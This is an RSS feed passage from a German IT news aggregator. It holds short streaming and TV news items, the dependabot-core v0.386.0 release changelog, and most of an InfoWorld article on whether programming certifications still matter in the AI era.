<description><![CDATA[Wenn ihr heute Abend oder für die nächsten Tage noch etwas Unterhaltung sucht, haben wir neben der unten erwähnten Wow-Aktion noch einen weiteren Tipp für euch. Über Amazon Prime Video kann man derzeit ohne zusätzliches Abo die erste Staffel der Apple-Serie „Silo“ ansehen und HBO Max eine Woche l...]]></description>
<link>https://tsecurity.de/de/3666193/ios-mac-os/prime-video-silo-gratis-und-hbo-max-im-probeabo/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666193/ios-mac-os/prime-video-silo-gratis-und-hbo-max-im-probeabo/</guid>
<pubDate>Mon, 13 Jul 2026 20:54:31 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://www.ifun.de/prime-video-silo-gratis-und-hbo-max-im-probeabo-283641/"><img align="right" hspace="5" width="150" height="150" src="https://images.ifun.de/wp-content/uploads/2026/07/hbo-max-150x150.jpg" class="alignright tfe wp-post-image" alt="Hbo Max" decoding="async"></a><p>Wenn ihr heute Abend oder für die nächsten Tage noch etwas Unterhaltung sucht, haben wir neben der unten erwähnten Wow-Aktion noch einen weiteren Tipp für euch. Über Amazon Prime Video kann man derzeit ohne zusätzliches Abo die erste Staffel der Apple-Serie „Silo“ ansehen und HBO Max eine Woche lang kostenlos testen. HBO Max kostenlos testen […]</p>
<p>The post <a href="https://www.ifun.de/prime-video-silo-gratis-und-hbo-max-im-probeabo-283641/">Prime Video: „Silo“ gratis und HBO Max im Probeabo</a> first appeared on <a href="https://www.ifun.de/">ifun.de</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v0.386.0]]></title>
<description><![CDATA[What's Changed

Capture offending gem details on bundler registry metadata errors by @kbukum1 in #15512
Bundler: apply empty-checksum metadata patch to the v2 helper by @kbukum1 in #15513
[Update graph] Ensure bystander txt files are removed before parsing for Python by @brrygrdn in #15508
Handle...]]></description>
<link>https://tsecurity.de/de/3665919/it-security-tools/v03860/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665919/it-security-tools/v03860/</guid>
<pubDate>Mon, 13 Jul 2026 18:35:24 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>Capture offending gem details on bundler registry metadata errors by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kbukum1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kbukum1">@kbukum1</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4824191752" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15512" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15512/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15512">#15512</a></li>
<li>Bundler: apply empty-checksum metadata patch to the v2 helper by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kbukum1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kbukum1">@kbukum1</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4824414250" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15513" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15513/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15513">#15513</a></li>
<li>[Update graph] Ensure bystander txt files are removed before parsing for Python by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brrygrdn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brrygrdn">@brrygrdn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4819771035" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15508" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15508/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15508">#15508</a></li>
<li>Handle global.json with no SDK version in dotnet_sdk parser by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brettfo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brettfo">@brettfo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4821557169" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15510" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15510/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15510">#15510</a></li>
<li>Type the cargo ecosystem and remove it from the T.untyped burndown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4810941973" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15492" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15492/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15492">#15492</a></li>
<li>Type the conda ecosystem and remove it from the T.untyped burndown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4811676578" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15493" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15493/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15493">#15493</a></li>
<li>Type the docker ecosystem and remove it from the T.untyped burndown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4811747259" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15495" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15495/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15495">#15495</a></li>
<li>Use shared git-tag cooldown in terraform by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/robaiken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/robaiken">@robaiken</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4786767074" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15472" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15472/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15472">#15472</a></li>
<li>Retry corepack once on signature metadata error by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> with @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4783580732" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15466" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15466/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15466">#15466</a></li>
<li>Type the deno, elm, devcontainers, bazel, and helm ecosystems by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4833014415" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15527" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15527/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15527">#15527</a></li>
<li>Add word-separator and lowercase formatting for branch name by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AbhishekBhaskar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AbhishekBhaskar">@AbhishekBhaskar</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4791908912" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15478" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15478/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15478">#15478</a></li>
<li>Fix Docker cooldown not respected for multi-arch images missing Last-Modified by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/robaiken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/robaiken">@robaiken</a> with @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4796035244" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15486" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15486/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15486">#15486</a></li>
<li>Reduce redundant git-source probes during npm metadata resolution by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> with @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4793483366" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15480" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15480/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15480">#15480</a></li>
<li>Type the maven ecosystem and remove it from the T.untyped burndown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4833182059" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15531" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15531/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15531">#15531</a></li>
<li>Add branch name config template format support with validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AbhishekBhaskar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AbhishekBhaskar">@AbhishekBhaskar</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4835027976" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15535" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15535/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15535">#15535</a></li>
<li>fix(gradle): prefer local gradlew for lockfile updates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4847310998" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15546" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15546/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15546">#15546</a></li>
<li>helm: support versioning-strategy (range-preserving updates) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/casey-robertson-paypal/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/casey-robertson-paypal">@casey-robertson-paypal</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4585878635" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15218" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15218/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15218">#15218</a></li>
<li>Bump gradle from 9.4.1-jdk21-ubi to 9.6.1-jdk21-ubi in /gradle by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4813506019" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15498" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15498/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15498">#15498</a></li>
<li>[Update graph] Add support for requirements.txt 'layering' instead of compressing to a single file by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brrygrdn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brrygrdn">@brrygrdn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4829476790" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15521" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15521/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15521">#15521</a></li>
<li>Allow periods in Helm values file names for Docker ecosystem by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/telnet23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/telnet23">@telnet23</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4862784915" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15557" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15557/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15557">#15557</a></li>
<li>Match existing group PRs covering a subset of job directories by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IanButterworth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IanButterworth">@IanButterworth</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4850701816" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15548" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15548/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15548">#15548</a></li>
<li>Bump library/golang from 1.26.1-bookworm to 1.26.5-bookworm in /go_modules by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4867732850" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15562" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15562/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15562">#15562</a></li>
<li>Fix npm security updates for transitive dependencies in workspace monorepos by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Swampen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Swampen">@Swampen</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4826508534" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15514" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15514/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15514">#15514</a></li>
<li>Add helm to the smoke-test matrix by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/casey-robertson-paypal/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/casey-robertson-paypal">@casey-robertson-paypal</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4857335602" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15554" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15554/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15554">#15554</a></li>
<li>v0.386.0 by @dependabot-core-action-automation[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4869767530" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15564" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15564/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15564">#15564</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/telnet23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/telnet23">@telnet23</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4862784915" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15557" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15557/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15557">#15557</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Swampen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Swampen">@Swampen</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4826508534" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15514" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15514/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15514">#15514</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/dependabot/dependabot-core/compare/v0.385.0...v0.386.0"><tt>v0.385.0...v0.386.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[WM kostenlos schauen: Wer Magenta TV bei McDonald’s gebucht hat, sollte langsam kündigen]]></title>
<description><![CDATA[Erinnerung für euch: MagentaTV hat bald ausgedient.]]></description>
<link>https://tsecurity.de/de/3665709/it-nachrichten/wm-kostenlos-schauen-wer-magenta-tv-bei-mcdonalds-gebucht-hat-sollte-langsam-kuendigen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665709/it-nachrichten/wm-kostenlos-schauen-wer-magenta-tv-bei-mcdonalds-gebucht-hat-sollte-langsam-kuendigen/</guid>
<pubDate>Mon, 13 Jul 2026 17:18:10 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Erinnerung für euch: MagentaTV hat bald ausgedient.]]></content:encoded>
</item>
<item>
<title><![CDATA[Do programming certifications still matter?]]></title>
<description><![CDATA[If you’re a software developer or architect, you might wonder if programming certifications are still worth the effort, especially in the era of rapid AI-driven evolution. The short answer is, it depends.



“Certifications are shifting from a checkbox to a compass. They’re less about proving you...]]></description>
<link>https://tsecurity.de/de/3665678/ai-nachrichten/do-programming-certifications-still-matter/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665678/ai-nachrichten/do-programming-certifications-still-matter/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:44 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">If you’re a software developer or architect, you might wonder if programming certifications are still worth the effort, especially in the era of rapid <a href="https://www.infoworld.com/article/2338115/what-is-generative-ai-artificial-intelligence-that-creates.html" data-type="link" data-id="https://www.infoworld.com/article/2338115/what-is-generative-ai-artificial-intelligence-that-creates.html">AI-driven evolution</a>. The short answer is, it depends.</p>



<p class="wp-block-paragraph">“Certifications are shifting from a checkbox to a compass. They’re less about proving you memorized syntax and more about proving you can architect systems, instruct AI coding assistants, and solve problems end-to-end,” says Faizel Khan, lead AI engineer at <a href="https://landingpoint.com/">Landing Point</a>, an executive search and recruiting firm.</p>



<p class="wp-block-paragraph">“In the AI era, fewer students will get trained on the job, which means they have to train themselves,” Khan says. “Certifications—especially architectural ones like AWS, Kubernetes, Terraform—are still the clearest path to do that.”</p>



<h2 class="wp-block-heading">Pros and cons of programming certifications</h2>



<p class="wp-block-paragraph">It’s not all black and white when it comes to deciding whether to pursue programming certifications. The effort involves both pros and cons.</p>



<p class="wp-block-paragraph">“In terms of pros, certifications concretely demonstrate that you have a skillset at a documented level,” says Chris Riccio, vice president of engineering at <a href="https://uplevelteam.com/">Uplevel</a>, an engineering optimization system provider. “They also show that you’ve put in the time and effort to learn, study, and prepare.”</p>



<p class="wp-block-paragraph">Programming certifications are “a useful way to validate foundational skills and show that someone understands core concepts,” says Greg Fuller, vice president of Skillsoft’s training provider, <a href="https://www.codecademy.com/">Codecademy</a>. “They’re especially helpful for people entering the field or shifting from adjacent roles.”</p>



<p class="wp-block-paragraph">Certifications offer a structured path to demonstrate proficiency, and they can confirm your ability to build and deploy in various environments, Fuller says.</p>



<p class="wp-block-paragraph">These types of certifications often demonstrate baseline proficiency and continuous learning, says Reshmi Ramachandran, head of partnerships and GTM strategy for <a href="https://www.cprime.com/">Cprime</a>, a consultancy. “These are often key indications of proficiency for companies looking to filter large candidate pools,” she says.</p>



<p class="wp-block-paragraph">Certifications really do two things, Khan adds. “First, they force you to learn by doing,” he says. “If you’re taking AWS Solutions Architect or Terraform, you don’t pass by guessing—you plan, build, and test systems. That practice matters. Second, they act as a public signal. Think of it like a micro-degree. You’re not just saying, ‘I know cloud.’ You’re showing you’ve crossed a bar that thousands of other engineers recognize.”</p>



<p class="wp-block-paragraph">But there are cons, too. “In tech, employers don’t just want credentials, they want proof you can deliver,” says Kevin Miller, CTO at <a href="https://www.ifs.com/industries/manufacturing/industrial-manufacturing">IFS</a>, a maker of factory automation software. “Programming certifications can be a valuable indicator of your baseline knowledge and competencies, especially if you’re early in your career or pivoting into tech, but their importance is dwindling.”</p>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/generative-ai/">AI tools</a> that can generate, debug, and optimize code are <a href="https://www.infoworld.com/article/4077352/85-of-developers-use-ai-regularly-jetbrains-survey.html" data-type="link" data-id="https://www.infoworld.com/article/4077352/85-of-developers-use-ai-regularly-jetbrains-survey.html">already performing tasks once done by entry-level developers</a>, “which means fewer traditional programming roles are available,” Miller says. “As a result, the job market is becoming more competitive, and certifications aren’t seen as the noteworthy achievement they once were.”</p>



<p class="wp-block-paragraph">What’s more, not all certifications carry the same weight, Riccio says. “Some may reflect only familiarity rather than true expertise,” he says. “Certifications also often measure ‘book knowledge’ rather than practical experience, and they don’t always map clearly to the requirements of a specific role.”</p>



<p class="wp-block-paragraph">Programming certifications “can be a helpful signal, especially for confirming baseline knowledge in areas like cloud, security, or devops, but they’re not the full picture,” says Morgan Watts, vice president of IT at <a href="https://developer.8x8.com/">8×8</a>, a contact center platform developer.</p>



<p class="wp-block-paragraph">“I’m more interested in a candidate’s attitude and aptitude: what problems they’ve solved, what they’ve built, and how they’ve approached challenges,” Watts says. “Certifications can show commitment and discipline, and they’re especially useful in highly specialized roles. But I’m cautious when someone presents a laundry list of certifications with little evidence of real-world application.”</p>



<p class="wp-block-paragraph">A certification without experience doesn’t carry much weight, Watts says, and over-certification can sometimes signal the wrong focus. “Ultimately, it’s the ability to apply knowledge, collaborate, and adapt that sets great developers apart,” he says.</p>



<p class="wp-block-paragraph">Finally, certifications can age fast, Khan says. “Tech stacks evolve and a badge from two years ago may already feel dusty,” he says. “And some certifications are paper-thin—multiple-choice exams that don’t prove you can debug production at 2 a.m. So, the risk is you collect badges but still can’t ship.”</p>



<h2 class="wp-block-heading">Which certifications will get you noticed?</h2>



<p class="wp-block-paragraph">Despite the drawbacks, certifications are still very much in demand, and some carry more weight than others.</p>



<p class="wp-block-paragraph">The most in-demand certifications are typically platform-based—Amazon Web Services (AWS), Google Cloud Platform (GCP), Microsoft Azure, and others, Riccio says. “Many of these platforms provide managed services that integrate with existing systems or serve as the glue between them,” he says. “Today’s engineering teams aren’t just building standalone systems in isolation; they’re using other systems to store data, orchestrate business workflows, and connect applications.”</p>



<p class="wp-block-paragraph">A certification that demonstrates the ability to build solutions on these platforms can put a development professional ahead of the competition, Riccio says.</p>



<p class="wp-block-paragraph">“The certifications I see in highest demand tend to reflect the evolving tech landscape,” Watts says. “Cloud certifications from AWS, Azure, and GCP are incredibly valuable, especially as distributed systems become the norm.”</p>



<p class="wp-block-paragraph">Also in demand are certifications for <a href="https://www.infoworld.com/article/3632270/the-devops-certifications-tech-companies-want.html">devops and CI/CD tools</a> including <a href="https://www.infoworld.com/article/3529526/how-to-succeed-with-kubernetes.html">Kubernetes</a>, <a href="https://www.infoworld.com/article/2257241/why-you-should-use-docker-and-oci-containers.html">Docker</a>, and <a href="https://www.infoworld.com/article/2260091/what-is-jenkins-the-ci-server-explained.html">Jenkins</a>, Watts says, “because deployment automation and reliability are critical at scale. Also, with AI reshaping development, we’re seeing growing interest in certifications around machine learning, data science, and AI model integration. These certifications stand out because they align directly with the skills that teams need to move faster and more intelligently.”</p>



<aside class="sidebar large">
<h3>More about developer certifications</h3>
<p>Learn more about developer courses and certifications tech companies want:</p>
<ul>
<li><a href="https://www.infoworld.com/article/4055032/ai-developer-certifications-tech-companies-want.html">AI developer certifications</a></li>
<li><a href="https://www.infoworld.com/article/3583466/the-machine-learning-certifications-tech-companies-want.html">Machine learning certifications</a></li>
<li><a href="https://www.infoworld.com/article/2337635/4-cloud-certifications-that-will-help-you-stand-out.html">Cloud development certifications</a></li>
<li><a href="https://www.infoworld.com/article/3632270/the-devops-certifications-tech-companies-want.html">Devops and CI/CD certifications</a></li>
</ul>
</aside>




<p class="wp-block-paragraph">On the AI front, certifications in <a href="https://www.infoworld.com/article/2255099/what-is-tensorflow-the-machine-learning-library-explained.html">TensorFlow</a> and other <a href="https://www.infoworld.com/article/3583466/the-machine-learning-certifications-tech-companies-want.html">machine learning platforms</a> are gaining traction as organizations look to embed AI across the development process, Watts says. “These are the certifications that align closely with where modern engineering is headed—scalable, secure, and AI-enabled,” he says.</p>



<p class="wp-block-paragraph">And then there are <a href="https://www.csoonline.com/article/3970107/the-14-most-valuable-cybersecurity-certifications.html">cybersecurity credentials</a> that continue to be in high demand. Security certifications, such as CompTIA Security+ or Certified Ethical Hacker, “have become essential as every company faces increasing cyber threats and compliance requirements,” Miller says.</p>



<p class="wp-block-paragraph">“Core programming certifications are still a bit niche, but the adjacent skills, like those that help developers deploy, secure, and scale their code, are driving demand,” Fuller says. “Companies want developers who understand the full lifecycle, not just how to write code.”</p>



<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/3980325/the-java-certifications-tech-companies-want.html">The best Java certifications for software developers</a>.</strong></p>



<h2 class="wp-block-heading">Certifications in the hiring process</h2>



<p class="wp-block-paragraph">Experts are clear that programming certifications alone will not get you the job. But they do play a role in the hiring process.</p>



<p class="wp-block-paragraph">“The information technology world is characterized by rapid and continuous evolution, including the skills and knowledge required to work in the field,” says Diane Rafferty, managing director of the National Technology Group at <a href="https://www.atriumglobal.com/">Atrium</a>, a global talent solutions and extended workforce management firm.</p>



<p class="wp-block-paragraph">“Certifications not only prove that you have the skills and knowledge needed, but they also show employers that you’re invested in your education and career growth,” Rafferty says. “They can give you a competitive edge when looking for a job, as many companies now require candidates to have them.”</p>



<p class="wp-block-paragraph">Certifications are one part of the hiring equation, “but never the only part,” Watts says. “They help validate that a candidate has taken the time to build foundational knowledge, and that’s a good sign. But I put more weight on how a person thinks, solves problems, and contributes to the team. I look for people who are curious and proactive, who are learning because they want to, not just because a course told them to.”</p>



<p class="wp-block-paragraph">Certifications can also play a valuable role in retention, Watts says. “I encourage team members to pursue growth, and when they invest in their own development, the whole organization benefits,” he says. “But again, it’s that balance of knowledge, attitude, and applied experience that really moves the needle.”</p>



<p class="wp-block-paragraph">Certifications “may allow you to breeze through the initial résumé screening process, potentially getting you to the next stage faster,” Riccio says. “At a minimum, they will set your profile apart from the rest of the pack. They also demonstrate that you’ve reached a baseline level of expertise, allowing hiring managers to quickly evaluate whether you have the skills for the role.”</p>



<p class="wp-block-paragraph">Employers today “care far less about whether someone has passed an exam and far more about whether they can apply knowledge effectively in real-world situations, leverage AI tools, and solve complex problems,” Miller says. “A certification might get someone an interview, but being able to demonstrate problem-solving skills, teamwork, and adaptability will really make them stand out.”</p>



<h2 class="wp-block-heading">Popular programming certifications</h2>



<p class="wp-block-paragraph">The following certifications consistently rose to the top in my conversations with tech leaders and hiring managers.</p>



<h3 class="wp-block-heading">AWS Certified Developer—Associate</h3>



<p class="wp-block-paragraph">Showcases skills and knowledge in developing, optimizing, packaging, and deploying applications, using CI/CD workflows, and identifying and resolving application issues, according to AWS. This certification is said to be a good starting point on the AWS certification journey for professionals in IT or cloud developer job roles.</p>



<h3 class="wp-block-heading">Azure Developer Associate</h3>



<p class="wp-block-paragraph">This certificate from Microsoft is intended for developers participating in all phases of cloud development, including design, deployment, maintenance, and monitoring. The course teaches developers how to create end-to-end solutions in Microsoft Azure, using the Microsoft Learn Sandbox environment to access Azure resources and services.</p>



<h3 class="wp-block-heading">Certified Kubernetes Application Developer (CKAD)</h3>



<p class="wp-block-paragraph">This certification was created by the Linux Foundation and Cloud Native Computing Foundation. It demonstrates that candidates can design, build, and deploy cloud-native applications for Kubernetes.</p>



